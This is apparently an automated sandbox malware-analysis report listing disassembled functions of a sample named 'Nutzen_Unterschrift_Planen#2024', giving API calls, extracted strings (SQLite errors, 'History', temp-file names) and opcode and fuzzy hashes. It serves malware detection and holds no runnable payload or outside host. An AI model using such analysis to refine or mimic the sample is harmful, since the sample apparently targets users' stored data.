                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: AttributesFilefreememset
                                                            • String ID:
                                                            • API String ID: 2507021081-0
                                                            • Opcode ID: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                            • Instruction ID: e31a4ad29e7632976921f0390f19c15604a95804a640e9d04457ce0419b5f72c
                                                            • Opcode Fuzzy Hash: f626a43687866fd62cff7198848d6d3005aba6e6c292beb9a178d7ac8eb7ae81
                                                            • Instruction Fuzzy Hash: 1211E632A04115EFDB209FA49DC59FF73A8EB45318B21013FF911E2280DF789D8196AE
                                                            Function 004174F5 Relevance: 9.1, APIs: 6, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AreFileApisANSI.KERNEL32 ref: 004174FC
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041751A
                                                            • malloc.MSVCRT ref: 00417524
                                                            • MultiByteToWideChar.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000), ref: 0041753B
                                                            • free.MSVCRT ref: 00417544
                                                            • free.MSVCRT ref: 00417562
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWidefree$ApisFilemalloc
                                                            • String ID:
                                                            • API String ID: 4131324427-0
                                                            • Opcode ID: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                            • Instruction ID: 8d188238c5fd2fb6163cec5331830b967abe0ebba74b79ef9884251e0929a2bc
                                                            • Opcode Fuzzy Hash: 2440c23a1bd9c14e736b75fc15117030069baeee03a9925480b775904b905708
                                                            • Instruction Fuzzy Hash: 9701D4726081257BEB215B7A9C41DEF3AAEDF463B47210226FC14E3280EA38DD4141BD
                                                            Function 00418197 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetTempPathW.KERNEL32(000000E6,?,?,00417D63), ref: 004181DB
                                                            • GetTempPathA.KERNEL32(000000E6,?,?,00417D63), ref: 00418203
                                                            • free.MSVCRT ref: 0041822B
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: PathTemp$free
                                                            • String ID: %s\etilqs_$etilqs_
                                                            • API String ID: 924794160-1420421710
                                                            • Opcode ID: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                            • Instruction ID: b359b55a6514fc6c55a0405950767d5f88b37029f74eadb26d8a0dc7501745d5
                                                            • Opcode Fuzzy Hash: 15bc68a9d504a75b2650ebb6305fe60db7282026434a3c37ef8699a19a7f4611
                                                            • Instruction Fuzzy Hash: 43313931A046169BE725A3669C41BFB735C9B64308F2004AFE881C2283EF7CDEC54A5D
                                                            Function 0040FD9E Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0040FDD5
                                                              • Part of subcall function 00414E7F: memcpy.MSVCRT(004032AD,&lt;,00000008,?,?,00000000,0040FDF6,?,?,?,<item>), ref: 00414EFC
                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                            • _snwprintf.MSVCRT ref: 0040FE1F
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
                                                            • String ID: <%s>%s</%s>$</item>$<item>
                                                            • API String ID: 1775345501-2769808009
                                                            • Opcode ID: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                            • Instruction ID: 102da8641e186e10bf8cf1b41b05db2e7c44eca872c9cddb12e5aab4d34b3b7e
                                                            • Opcode Fuzzy Hash: a80adfea278a619b769589c982a5f837149a8ec15786c25d02deefdd1f26e855
                                                            • Instruction Fuzzy Hash: 3111C131600219BBDB21AF65CC86E99BB65FF04348F00007AFD05676A2C779E968CBC9
                                                            Function 00414770 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wcscpy.MSVCRT ref: 0041477F
                                                            • wcscpy.MSVCRT ref: 0041479A
                                                            • CreateFileW.KERNEL32(00000002,40000000,00000000,00000000,00000002,00000000,00000000,?,00000000,?,00411B67,?,General,?,00000000,00000001), ref: 004147C1
                                                            • CloseHandle.KERNEL32(00000000), ref: 004147C8
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: wcscpy$CloseCreateFileHandle
                                                            • String ID: General
                                                            • API String ID: 999786162-26480598
                                                            • Opcode ID: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                            • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                                                            • Opcode Fuzzy Hash: 54671a12e9c864bd4b64cc02a8f827eeeeb56075ac3ac549414b1b6b262afd21
                                                            • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                                                            Function 0040973C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00000000,?,00410669,00000000,?,00412758,00000000,00000000,?,00000000,00000000,00000000), ref: 00409750
                                                            • _snwprintf.MSVCRT ref: 0040977D
                                                            • MessageBoxW.USER32(00000000,?,Error,00000030), ref: 00409796
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ErrorLastMessage_snwprintf
                                                            • String ID: Error$Error %d: %s
                                                            • API String ID: 313946961-1552265934
                                                            • Opcode ID: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                            • Instruction ID: 46023337ddced075b6ccb796d059e6b1f6412beb8ed51135551ede388a9512b7
                                                            • Opcode Fuzzy Hash: c861dc242bfbf6db3d3f925a4a6d39e026dc42dc2a3b2392217f61369f55f285
                                                            • Instruction Fuzzy Hash: C1F0A7765402086BDB11A795DC06FDA73BCFB45785F0404ABB544A3181DAB4EA484A59
                                                            Function 00435A61 Relevance: 7.9, APIs: 1, Strings: 4, Instructions: 394COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: foreign key constraint failed$new$oid$old
                                                            • API String ID: 0-1953309616
                                                            • Opcode ID: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                            • Instruction ID: 109d2bbf80905f1e2503505ff3b1f335ff26ebd6ff49ac5ca42eb4ed0232da3f
                                                            • Opcode Fuzzy Hash: 069b176ce5c0b1780be5899369789ed0400efb36521cc305734fd4b3024b452b
                                                            • Instruction Fuzzy Hash: 71E19271E00318EFDF14DFA5D882AAEBBB5EF08304F54406EE805AB351DB799A01CB65
                                                            Function 00431671 Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 231COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            • foreign key on %s should reference only one column of table %T, xrefs: 004316CD
                                                            • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 004316F5
                                                            • unknown column "%s" in foreign key definition, xrefs: 00431858
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpy
                                                            • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                            • API String ID: 3510742995-272990098
                                                            • Opcode ID: 3329e545d5ec6aba1881b0fa4301c309bd0113fbb75ee4600ef066edaf7bf9ee
                                                            • Instruction ID: d29657cdd308451ad819b70b0710bc7d1770ace047979dc07f2e4ef1020519d4
                                                            • Opcode Fuzzy Hash: 3329e545d5ec6aba1881b0fa4301c309bd0113fbb75ee4600ef066edaf7bf9ee
                                                            • Instruction Fuzzy Hash: B7913E75A00205DFCB14DF99C481AAEBBF1FF49314F25815AE805AB312DB35E941CF99
                                                            Function 0044A6E0 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 84COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 0044A6EB
                                                            • memset.MSVCRT ref: 0044A6FB
                                                            • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                            • memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: memcpymemset
                                                            • String ID: gj
                                                            • API String ID: 1297977491-4203073231
                                                            • Opcode ID: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                            • Instruction ID: b45f8a370873a883e9703370fbfe8b0477d3556cf02d11e6db591a78d085f858
                                                            • Opcode Fuzzy Hash: 89e2b4c479d66d8f351294c0966a75ef3485227debcc485d945bfba73828c7b8
                                                            • Instruction Fuzzy Hash: 95213DB67403002BE7209A39CC4165B7B6D9FC6318F0A481EF6464B346E67DD605C756
                                                            Function 0040E946 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                              • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E961
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E974
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E987
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00411CA8,00000000,?,00412766,00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040E99A
                                                            • free.MSVCRT ref: 0040E9D3
                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??3@$free
                                                            • String ID:
                                                            • API String ID: 2241099983-0
                                                            • Opcode ID: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                            • Instruction ID: 098569c1990a85f87ddbd530571c52e66e2f7ba0f471894b996c1416d461d1fd
                                                            • Opcode Fuzzy Hash: 1a8555f46c1a3ec8b66a42d0cb8e1340db676157345f2d4bb75338048ae0e025
                                                            • Instruction Fuzzy Hash: 5001A932A01A2097C665BB27A50195EB354BE86B24316896FF844773C1CB3C6C61C6DF
                                                            Function 0041748F Relevance: 7.6, APIs: 5, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • AreFileApisANSI.KERNEL32 ref: 00417497
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 004174B7
                                                            • malloc.MSVCRT ref: 004174BD
                                                            • WideCharToMultiByte.KERNEL32(00000001,00000000,?,000000FF,00000000,?,00000000,00000000), ref: 004174DB
                                                            • free.MSVCRT ref: 004174E4
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ByteCharMultiWide$ApisFilefreemalloc
                                                            • String ID:
                                                            • API String ID: 4053608372-0
                                                            • Opcode ID: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                            • Instruction ID: 68224c9aa4b31b20fa5037399352f9c2f04b40a845063e8f60522cdb36b448b3
                                                            • Opcode Fuzzy Hash: 731f1bc2d56076fd9335eacaa0243be786ea79a0eeca4ef4ad1c585bb51aa26c
                                                            • Instruction Fuzzy Hash: DE01A4B150412DBEAF115FA99C80CAF7E7CEA463FC721422AF514E2290DA345E405AB9
                                                            Function 0040D441 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 0040D453
                                                            • GetWindowRect.USER32(?,?), ref: 0040D460
                                                            • GetClientRect.USER32(00000000,?), ref: 0040D46B
                                                            • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0040D47B
                                                            • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 0040D497
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$ClientParentPoints
                                                            • String ID:
                                                            • API String ID: 4247780290-0
                                                            • Opcode ID: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                            • Instruction ID: 8744084584fea1eb3916f9079d499296a2dd08f7759f51c0708cf8f54c9212ed
                                                            • Opcode Fuzzy Hash: 51bf500d43eb7ed80d01eeab879738f26fa22579f9dd5d7918c8ee0e3f904b1b
                                                            • Instruction Fuzzy Hash: 62018836801129BBDB11EBA6CC49EFFBFBCFF06310F048069F901A2180D778A5018BA5
                                                            Function 00445093 Relevance: 7.5, APIs: 5, Instructions: 46COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                            • GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                            • ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                            • memset.MSVCRT ref: 004450CD
                                                              • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                            • ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                              • Part of subcall function 00444E84: memchr.MSVCRT ref: 00444EBF
                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,0044EB0C,0000000B,?,?,?,00000000,00000000,00000000), ref: 00444F63
                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,00000001,00000008,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00444F75
                                                              • Part of subcall function 00444E84: memcpy.MSVCRT(?,?,00000010,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00444F9D
                                                            • CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Filememcpy$??2@??3@CloseCreateHandleReadSizememchrmemset
                                                            • String ID:
                                                            • API String ID: 1471605966-0
                                                            • Opcode ID: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                            • Instruction ID: af7e2442fb2a0afe256a59df9b01c6fa6c67666c78107f96d02934f32f814c95
                                                            • Opcode Fuzzy Hash: edfdfd5907517e88f4142de78b3de7a943e3e7aedefbd09b5ff7bb7402004b57
                                                            • Instruction Fuzzy Hash: D8F0C2765002107BE5207736AC8AEAB3A5CDF96771F11893FF416921D2EE698814C1BD
                                                            Function 0044474A Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wcscpy.MSVCRT ref: 0044475F
                                                            • wcscat.MSVCRT ref: 0044476E
                                                            • wcscat.MSVCRT ref: 0044477F
                                                            • wcscat.MSVCRT ref: 0044478E
                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,000000FF,?,004447C5,00000000,?,?,?,00000000,?), ref: 004099E3
                                                              • Part of subcall function 00409A90: lstrcpyW.KERNEL32(?,?,004447CD,?,?,?,00000000,?), ref: 00409AA5
                                                              • Part of subcall function 00409A90: lstrlenW.KERNEL32(?), ref: 00409AAC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: wcscat$lstrcpylstrlenmemcpywcscpywcslen
                                                            • String ID: \StringFileInfo\
                                                            • API String ID: 102104167-2245444037
                                                            • Opcode ID: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                            • Instruction ID: e4f437c51a7ffcfb72b972a214432876dbdec8abc2c75880463b8380eb377783
                                                            • Opcode Fuzzy Hash: 5de2f5fc2277cc411a3074599cad155646ee2126b3ab30f355a99381f63f29ed
                                                            • Instruction Fuzzy Hash: 41018FB290021DB6EF10EAA1DC45EDF73BCAB05304F0004B7B514F2052EE38DB969B69
                                                            Function 0040E8E0 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8EC
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E8FA
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E90B
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E922
                                                            • ??3@YAXPAX@Z.MSVCRT(?,?,00000000,0040EB18,?,?,?,00402F49,?,?,004126A8,00000000,00000000,?,00000000), ref: 0040E92B
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: ??3@
                                                            • String ID:
                                                            • API String ID: 613200358-0
                                                            • Opcode ID: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                            • Instruction ID: 8b058f36177a858601f18eb469b8e3bd7c1df3fc7b9e847ab044313c89d6339d
                                                            • Opcode Fuzzy Hash: 7720251f6b3597deba6bb463f6abe47e07af712d95c5f1ebbc7652e386869f9d
                                                            • Instruction Fuzzy Hash: 98F012B25047015FD760AF6AA8C491BF3E9AB597147668C3FF149D3641CB38FC508A1C
                                                            Function 00401942 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemMetrics.USER32(00000000), ref: 00401990
                                                            • GetSystemMetrics.USER32(00000001), ref: 0040199B
                                                            • SetWindowPlacement.USER32(00000000,?), ref: 004019CC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MetricsSystem$PlacementWindow
                                                            • String ID: AE
                                                            • API String ID: 3548547718-685266089
                                                            • Opcode ID: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                            • Instruction ID: bc47655bc3d2af3ddac3cbb2ac08b89d1fd66a09df9f10e9f6ff2044f470f5ca
                                                            • Opcode Fuzzy Hash: eb2f8e64a603564a933fd5a75b54da642a0a5aacc70f311db6863d86cb8a116d
                                                            • Instruction Fuzzy Hash: 4C11AC719002099BCF20CF5EC8987EE77B5BF41308F15017ADC90BB292D670A841CB64
                                                            Function 0040AAE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            • Associated: 00000003.00000002.316902567904.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_3_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: _memicmpwcslen
                                                            • String ID: @@@@$History
                                                            • API String ID: 1872909662-685208920
                                                            • Opcode ID: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                            • Instruction ID: 0314511eba11a06c501d0b319d6753a7178557fc2485e08f734f24cb460fdfed
                                                            • Opcode Fuzzy Hash: b53e6bfe39813f40e33e088c97292d20a71445cfbc3f913cd0ff49abdb82a555
                                                            • Instruction Fuzzy Hash: F1F0CD3310471157D210DE199C41A2BF7F8DB813A5F11063FF991A31C2D739EC658657
                                                            Function 004100D7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 43COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.MSVCRT ref: 004100FB
                                                            • memset.MSVCRT ref: 00410112
                                                              • Part of subcall function 0040F5BE: wcscpy.MSVCRT ref: 0040F5C3
                                                              • Part of subcall function 0040F5BE: _wcslwr.MSVCRT ref: 0040F5FE
                                                            • _snwprintf.MSVCRT ref: 00410141
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.316902567904.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000003.00000002.316902567904.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
